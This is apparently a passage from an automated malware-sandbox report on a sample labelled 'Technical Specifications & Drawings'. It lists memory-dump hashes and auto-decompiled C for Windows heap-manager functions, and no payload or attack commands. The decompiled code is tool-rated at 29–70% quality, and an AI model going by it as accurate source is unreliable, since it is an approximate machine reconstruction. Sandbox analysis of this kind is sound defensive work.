                                                  0x00000000
                                                  0x0187eb26
                                                  0x0187ead6
                                                  0x0187ead9
                                                  0x0187eadc
                                                  0x0187eadc
                                                  0x0187eadc
                                                  0x0187eade
                                                  0x0187eae4
                                                  0x00000000
                                                  0x00000000
                                                  0x0187eaee
                                                  0x0187eaf7
                                                  0x0187eaf9
                                                  0x00000000
                                                  0x00000000
                                                  0x0187eb04
                                                  0x0187eb12
                                                  0x00000000
                                                  0x0187eb12
                                                  0x0187eb06
                                                  0x00000000
                                                  0x0187eb06
                                                  0x0187eaf0
                                                  0x0187eaf2
                                                  0x0187eaf4
                                                  0x00000000
                                                  0x0187eaf4
                                                  0x0187ea6a
                                                  0x0187ea21
                                                  0x00000000
                                                  0x0187ea21
                                                  0x0187e9d6
                                                  0x0187e9d6
                                                  0x0187e9e0
                                                  0x0187e9e2
                                                  0x0187e9e2
                                                  0x0187e9e8
                                                  0x00000000
                                                  0x0187e9e8
                                                  0x0187e987
                                                  0x0187e98f
                                                  0x0187e992
                                                  0x0187e995
                                                  0x0187e995
                                                  0x0187e998
                                                  0x0187e998
                                                  0x0187e99a
                                                  0x0187e9a0
                                                  0x00000000
                                                  0x00000000
                                                  0x0187e9a9
                                                  0x0187e9b2
                                                  0x0187e9b4
                                                  0x00000000
                                                  0x00000000
                                                  0x0187e9ba
                                                  0x0187e9c1
                                                  0x0187e9cf
                                                  0x00000000
                                                  0x0187e9cf
                                                  0x0187e9c3
                                                  0x00000000
                                                  0x0187e9c3
                                                  0x0187e9ab
                                                  0x0187e9ad
                                                  0x0187e9af
                                                  0x00000000
                                                  0x0187e9af
                                                  0x0187e924
                                                  0x0187e8b7
                                                  0x0187e8ba
                                                  0x0187e902
                                                  0x0187e908
                                                  0x0187e90a
                                                  0x00000000
                                                  0x0187e90a
                                                  0x0187e8bc
                                                  0x0187e8bf
                                                  0x0187e8f9
                                                  0x0187e8ff
                                                  0x0187e901
                                                  0x00000000
                                                  0x0187e901
                                                  0x0187e8c1
                                                  0x0187e8c4
                                                  0x0187e8f0
                                                  0x0187e8f6
                                                  0x0187e8f8
                                                  0x00000000
                                                  0x0187e8f8
                                                  0x0187e8c6
                                                  0x0187e8c9
                                                  0x0187e8e7
                                                  0x0187e8ed
                                                  0x0187e8ef
                                                  0x00000000
                                                  0x0187e8ef
                                                  0x0187e8cb
                                                  0x0187e8ce
                                                  0x0187e8de
                                                  0x0187e8e4
                                                  0x0187e8e6
                                                  0x00000000
                                                  0x0187e8e6
                                                  0x0187e8d3
                                                  0x00000000
                                                  0x0187e8d5
                                                  0x0187e8db
                                                  0x0187e8dd
                                                  0x00000000
                                                  0x0187e8dd
                                                  0x0187e853
                                                  0x0187e855
                                                  0x0187e85b
                                                  0x0187e85d
                                                  0x0187e897
                                                  0x0187e89c
                                                  0x0187e8a2
                                                  0x0187e8a6
                                                  0x0187e8ab
                                                  0x0187e8ad
                                                  0x0187e8ad
                                                  0x00000000
                                                  0x0187e85d

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: a7220c762067b51cedc74fd3c81710ee89422d6de05a241ea57158e1a7e3bc79
                                                  • Instruction ID: c519a464f5a5d48fd9befe5638ce35c87987c3f8ca8479a04ba37b4cae7687f5
                                                  • Opcode Fuzzy Hash: a7220c762067b51cedc74fd3c81710ee89422d6de05a241ea57158e1a7e3bc79
                                                  • Instruction Fuzzy Hash: E302A272E006169BCB18CF6DC89167EFBF6EF88300B1981ADD456EB391D634EA41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 29%
                                                  			E017A40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E017AB150(", passed to %s", _t29);
					}
					_push("\n");
					E017AB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1896378 = 1;
						asm("int3");
						 *0x1896378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                  0x017a40e6
                                                  0x017a40e8
                                                  0x017a40f1
                                                  0x0180042d
                                                  0x0180044c
                                                  0x01800451
                                                  0x0180042f
                                                  0x01800444
                                                  0x01800449
                                                  0x0180045d
                                                  0x01800466
                                                  0x0180046e
                                                  0x01800474
                                                  0x01800475
                                                  0x0180047a
                                                  0x0180048a
                                                  0x0180048c
                                                  0x01800493
                                                  0x01800494
                                                  0x01800494
                                                  0x00000000
                                                  0x0180049b
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                  • API String ID: 0-188067316
                                                  • Opcode ID: f35d8460c1708914075f62c755859a5cfb56a404f0eb6d802c69a87afc2b8ac6
                                                  • Instruction ID: 3e4dbb4c8e8de8bd5b9432effe0ab9eccc063be02a3318959e9b17c34b5aa926
                                                  • Opcode Fuzzy Hash: f35d8460c1708914075f62c755859a5cfb56a404f0eb6d802c69a87afc2b8ac6
                                                  • Instruction Fuzzy Hash: 7801C032140644BED326A76DE8DDF52FBA4DB80F78F2A426EF00987781CAE4A940C215
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E017CA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1898748 - 1;
					if( *0x1898748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
									_t260 = _t257 + 4;
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E017AB150();
								_t257 = _t260 + 4;
								__eflags =  *0x1897bc8;
								if(__eflags == 0) {
									E01862073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0186A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E017FD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E017CAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0186A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0186A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1898748 - 1;
					if( *0x1898748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E017AB150();
							__eflags =  *0x1897bc8;
							if(__eflags == 0) {
								_t131 = E01862073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                  0x017ca83a
                                                  0x017ca83c
                                                  0x017ca83e
                                                  0x017ca841
                                                  0x017ca844
                                                  0x017ca84a
                                                  0x017caa53
                                                  0x017caa59
                                                  0x017caa59
                                                  0x017ca858
                                                  0x017ca85e
                                                  0x017caaf5
                                                  0x017caafc
                                                  0x0181229e
                                                  0x018122a2
                                                  0x018122a8
                                                  0x018122b3
                                                  0x018122b5
                                                  0x018122bb
                                                  0x018122c1
                                                  0x018122c5
                                                  0x018122e6
                                                  0x018122eb
                                                  0x018122f0
                                                  0x018122c7
                                                  0x018122dc
                                                  0x018122e1
                                                  0x018122e1
                                                  0x018122f3
                                                  0x018122f8
                                                  0x018122fd
                                                  0x01812300
                                                  0x01812307
                                                  0x0181230e
                                                  0x0181230e
                                                  0x01812313
                                                  0x01812313
                                                  0x018122b5
                                                  0x018122a2
                                                  0x017caafc
                                                  0x017ca864
                                                  0x017ca869
                                                  0x017caa5c
                                                  0x017caa5e
                                                  0x017ca86f
                                                  0x017ca87f
                                                  0x017ca885
                                                  0x017ca885
                                                  0x017ca88b
                                                  0x017ca890
                                                  0x017ca896
                                                  0x017cab0c
                                                  0x017cab0f
                                                  0x017cab15
                                                  0x01812320
                                                  0x01812320
                                                  0x017cab1b
                                                  0x017ca89c
                                                  0x017ca89f
                                                  0x017ca8a2
                                                  0x017ca8a2
                                                  0x017ca8a5
                                                  0x017ca8af
                                                  0x017ca8b3
                                                  0x017ca8b8
                                                  0x017caa66
                                                  0x017ca8be
                                                  0x017ca8c5
                                                  0x017ca8c6
                                                  0x017ca8ce
                                                  0x01812328
                                                  0x01812332
                                                  0x01812337
                                                  0x01812337
                                                  0x017ca8ce
                                                  0x017ca8d4
                                                  0x017ca8d8
                                                  0x017ca8db
                                                  0x017ca8de
                                                  0x017ca8e1
                                                  0x017ca8e5
                                                  0x017ca8e8
                                                  0x017ca8f0
                                                  0x017ca8f3
                                                  0x0181234c
                                                  0x01812350
                                                  0x01812355
                                                  0x01812359
                                                  0x01812359
                                                  0x017ca8f9
                                                  0x017ca901
                                                  0x017caae4
                                                  0x017caae4
                                                  0x017caaea
                                                  0x00000000
                                                  0x017ca907
                                                  0x017ca90a
                                                  0x017ca91d
                                                  0x017ca91d
                                                  0x00000000
                                                  0x017ca910
                                                  0x017ca910
                                                  0x017ca910
                                                  0x017ca914
                                                  0x017ca924
                                                  0x017ca924
                                                  0x017ca924
                                                  0x017ca924
                                                  0x017ca916
                                                  0x017ca91b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca91b
                                                  0x017ca925
                                                  0x017ca925
                                                  0x017ca932
                                                  0x017ca936
                                                  0x017ca93c
                                                  0x017ca93c
                                                  0x017ca93c
                                                  0x017cab22
                                                  0x017cab24
                                                  0x017cab27
                                                  0x017cab27
                                                  0x017ca942
                                                  0x017ca944
                                                  0x017caaba
                                                  0x017caabd
                                                  0x017caac0
                                                  0x017caac0
                                                  0x017caac2
                                                  0x017cab2f
                                                  0x017caac4
                                                  0x017caac4
                                                  0x017caac7
                                                  0x017caaca
                                                  0x017caacc
                                                  0x017caace
                                                  0x017caace
                                                  0x017caace
                                                  0x017caad1
                                                  0x017caad1
                                                  0x017caad7
                                                  0x017caad9
                                                  0x00000000
                                                  0x00000000
                                                  0x01812361
                                                  0x01812369
                                                  0x0181236b
                                                  0x00000000
                                                  0x01812371
                                                  0x00000000
                                                  0x01812371
                                                  0x00000000
                                                  0x0181236b
                                                  0x017caac0
                                                  0x017ca94a
                                                  0x017ca94a
                                                  0x017ca94d
                                                  0x017ca94d
                                                  0x017ca950
                                                  0x017ca954
                                                  0x01812376
                                                  0x01812380
                                                  0x017ca95a
                                                  0x017ca95a
                                                  0x017ca95c
                                                  0x017ca95f
                                                  0x017ca961
                                                  0x017ca961
                                                  0x017ca967
                                                  0x017ca96a
                                                  0x017ca972
                                                  0x017caa02
                                                  0x017caa06
                                                  0x017caa10
                                                  0x017caa16
                                                  0x017caa16
                                                  0x017caa1b
                                                  0x017caa21
                                                  0x017caa24
                                                  0x017caa27
                                                  0x017caa29
                                                  0x017caa2c
                                                  0x017caa32
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca978
                                                  0x017ca978
                                                  0x017ca97b
                                                  0x017ca981
                                                  0x017ca996
                                                  0x017ca998
                                                  0x017ca99f
                                                  0x017ca9a2
                                                  0x0181238a
                                                  0x017ca9a8
                                                  0x017ca9a8
                                                  0x017ca9a8
                                                  0x017ca9aa
                                                  0x017ca9ad
                                                  0x017ca9b0
                                                  0x017ca9bb
                                                  0x017ca9be
                                                  0x017ca9c7
                                                  0x017ca9c9
                                                  0x017ca9c9
                                                  0x017ca9cc
                                                  0x017ca9d1
                                                  0x017caa6d
                                                  0x017caa70
                                                  0x017caa73
                                                  0x017caa75
                                                  0x017caa79
                                                  0x017caa7e
                                                  0x017caa82
                                                  0x017caa8f
                                                  0x017caa94
                                                  0x017caa96
                                                  0x01812392
                                                  0x018123a1
                                                  0x018123a1
                                                  0x017caa9c
                                                  0x017caa9f
                                                  0x017caaa2
                                                  0x017caaa2
                                                  0x017caaa8
                                                  0x017caaab
                                                  0x017caaaf
                                                  0x00000000
                                                  0x017caab5
                                                  0x00000000
                                                  0x017caab5
                                                  0x017ca9d7
                                                  0x017ca9d7
                                                  0x017ca9da
                                                  0x017ca9e0
                                                  0x017ca9e3
                                                  0x017ca9e6
                                                  0x017ca9e9
                                                  0x017ca9eb
                                                  0x017ca9fd
                                                  0x017ca9fd
                                                  0x00000000
                                                  0x017ca9eb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca983
                                                  0x017ca983
                                                  0x017ca983
                                                  0x017ca987
                                                  0x017ca995
                                                  0x017ca995
                                                  0x017ca995
                                                  0x017ca995
                                                  0x017ca989
                                                  0x017ca98e
                                                  0x00000000
                                                  0x017ca990
                                                  0x00000000
                                                  0x017ca990
                                                  0x017ca98e
                                                  0x00000000
                                                  0x017ca983
                                                  0x017ca972
                                                  0x017ca90a
                                                  0x017caa34
                                                  0x017caa34
                                                  0x017caa40
                                                  0x017caa43
                                                  0x017caa46
                                                  0x017caa4d
                                                  0x018123ab
                                                  0x018123b2
                                                  0x018123b8
                                                  0x018123be
                                                  0x018123c3
                                                  0x018123c5
                                                  0x018123cb
                                                  0x018123d1
                                                  0x018123d5
                                                  0x018123f6
                                                  0x018123fb
                                                  0x018123d7
                                                  0x018123ec
                                                  0x018123f1
                                                  0x01812403
                                                  0x01812408
                                                  0x01812410
                                                  0x01812417
                                                  0x01812422
                                                  0x01812422
                                                  0x01812417
                                                  0x018123c5
                                                  0x018123b2
                                                  0x00000000

                                                  Strings
                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018122F3
                                                  • HEAP: , xrefs: 018122E6, 018123F6
                                                  • HEAP[%wZ]: , xrefs: 018122D7, 018123E7
                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01812403
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                  • API String ID: 0-1657114761
                                                  • Opcode ID: 0bfa95f9b3827c35071e88c59dcfa558465530ba9d0704b803a73b2c50d52ab7
                                                  • Instruction ID: 4337a585b9bed25448a94b64ae592f1dc4871f18c96058459e626e576e5b7387
                                                  • Opcode Fuzzy Hash: 0bfa95f9b3827c35071e88c59dcfa558465530ba9d0704b803a73b2c50d52ab7
                                                  • Instruction Fuzzy Hash: 49D1CD74A0064A9FDB19CF6CC490BAAFBF2FF48701F15856DD94A9B346E330AA41CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E017CA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E017CDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E017E9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0186A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E017E9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E017AB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E017C7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0186138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E017C7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E017C7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01861582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E017C7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
